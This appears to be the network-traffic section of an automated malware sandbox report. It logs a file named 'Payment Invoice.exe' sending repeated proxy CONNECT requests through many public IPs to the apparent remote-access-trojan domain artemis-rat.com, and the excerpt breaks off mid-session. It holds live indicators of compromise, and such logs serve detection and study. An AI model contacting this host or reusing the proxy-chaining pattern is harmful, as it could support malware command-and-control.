                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                687192.168.2.452042212.31.100.13841537076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.191354990 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                688192.168.2.45201838.156.72.19580807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.191629887 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:20.033159971 CET19INHTTP/1.1 200 OK


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                689192.168.2.45208327.0.234.20610807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.191637993 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                690192.168.2.452095178.54.21.20380817076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.191915989 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                691192.168.2.45207391.202.230.21980807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.195446968 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                692192.168.2.45208791.148.127.16280807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.195663929 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                693192.168.2.45211098.162.25.29316797076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.196029902 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                694192.168.2.45211767.227.186.83563707076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.200058937 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:17.823779106 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:18.511460066 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:19.823925972 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:22.527349949 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:25.214521885 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:27.823926926 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:33.011467934 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:43.323605061 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                695192.168.2.45208849.228.131.16950007076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.239518881 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                696192.168.2.452207104.21.31.189807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.241358042 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:17.395745039 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:17 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                697192.168.2.45210695.66.138.2188807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.242216110 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                698192.168.2.452239172.67.181.17807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.242852926 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:17.397531033 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:17 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                699192.168.2.449781208.109.14.49228817076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.242948055 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                700192.168.2.45210845.138.87.23810807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.242952108 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                701192.168.2.451281148.72.215.79632127076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.243113041 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:20.278759003 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:23.379076004 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:29.386594057 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:41.390089989 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                702192.168.2.45206172.49.49.11310347076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.243329048 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:18.214246988 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                703192.168.2.45129985.193.93.7331287076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.244241953 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:20.323550940 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:28.000149012 CET39INHTTP/1.1 200 Connection established


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                704192.168.2.452258104.20.198.49807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.244353056 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:17.399307966 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:17 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                705192.168.2.452264104.25.58.39807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.247700930 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:17.401890039 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:17 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                706192.168.2.45213043.163.192.3156737076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.248011112 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                707192.168.2.452109202.162.219.1010807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.260004044 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                708192.168.2.452217162.241.79.22353187076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.261051893 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:17.761141062 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:18.386436939 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:19.589611053 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.980189085 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:24.386895895 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:26.771876097 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                709192.168.2.452204148.72.23.56361117076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.263689041 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:17.870017052 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:18.559196949 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:19.865209103 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:22.559535980 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:25.217179060 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:27.886740923 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:33.089483976 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                710192.168.2.451378164.92.86.113505647076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.263894081 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:20.278724909 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                711192.168.2.45219752.151.210.20490007076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.267767906 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                712192.168.2.45219272.10.164.17826757076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.270206928 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
